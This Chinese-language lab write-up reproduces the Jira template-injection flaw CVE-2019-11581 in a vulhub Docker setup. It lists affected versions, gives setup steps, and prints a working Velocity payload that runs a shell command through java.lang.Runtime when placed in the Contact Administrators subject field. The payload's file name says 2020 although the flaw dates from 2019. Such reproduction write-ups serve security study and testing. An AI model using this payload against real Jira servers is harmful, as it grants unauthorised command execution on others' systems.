Atlassian Jira 模板注入漏洞（CVE-2019-11581）

声明

好好学习，天天向上

漏洞描述

Atlassian Jira是企业广泛使用的项目与事务跟踪工具，被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令：

影响范围

4.4.x
5.x.x
6.x.x
7.0.x
7.1.x
7.2.x
7.3.x
7.4.x
7.5.x
7.6.x before 7.6.14 (the fixed version for 7.6.x)
7.7.x
7.8.x
7.9.x
7.10.x
7.11.x
7.12.x
7.13.x before 7.13.5 (the fixed version for 7.13.x)
8.0.x before 8.0.3 (the fixed version for 8.0.x)
8.1.x before 8.1.2 (the fixed version for 8.1.x)
8.2.x before 8.2.3 (the fixed version for 8.2.x)

复现过程

这里使用8.1.0版本

使用vulhub

cd /app/vulhub-master/jira/CVE-2019-11581

使用docker启动

docker-compose up -d

搭建过程跟confluence类似，都要申请key，很繁琐

环境启动后，访问http://your-ip:8080会进入安装引导，切换“中文”，VPS条件下选择“将其设置为我”（第一项）去Atlassian官方申请一个Jira Server的测试证书（不要选择Data Center和Addons）：

然后继续安装即可。这一步小内存VPS可能安装失败或时间较长（强烈建议必须使用4G内存以上的机器进行安装与测试，否则报错报的你怀疑人生），请耐心等待，安装过程中记住你输入的用户名和密码，一会需要登录使用，让你输入邮箱，比如1@2…那么1就是你的用户名。

http://192.168.239.129:8080

安装完成，docker服务器8G内存果然不是盖的

登录成功后访问，添加

http://192.168.239.129:8080/secure/admin/AddSmtpMailServer!default.jspa

访问，进行系统设置

http://192.168.239.129:8080/secure/admin/EditApplicationProperties!default.jspa

左上角创建按钮，随便创建一个项目

创建成功后，访问

http://192.168.239.129:8080/secure/ContactAdministrators!default.jspa

漏洞爆发点在主题字段，把主题换上我们的payload，点击发送

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()

点发送后，实际上命令就已经执行了，如果发现还没执行，可以先去线面看看是不是卡队列了，如果队列里都空了，那十有八九都执行了

http://192.168.239.129:8080/secure/admin/MailQueueAdmin!default.jspa?page=

关闭镜像（每次用完后关闭）

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose build
docker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down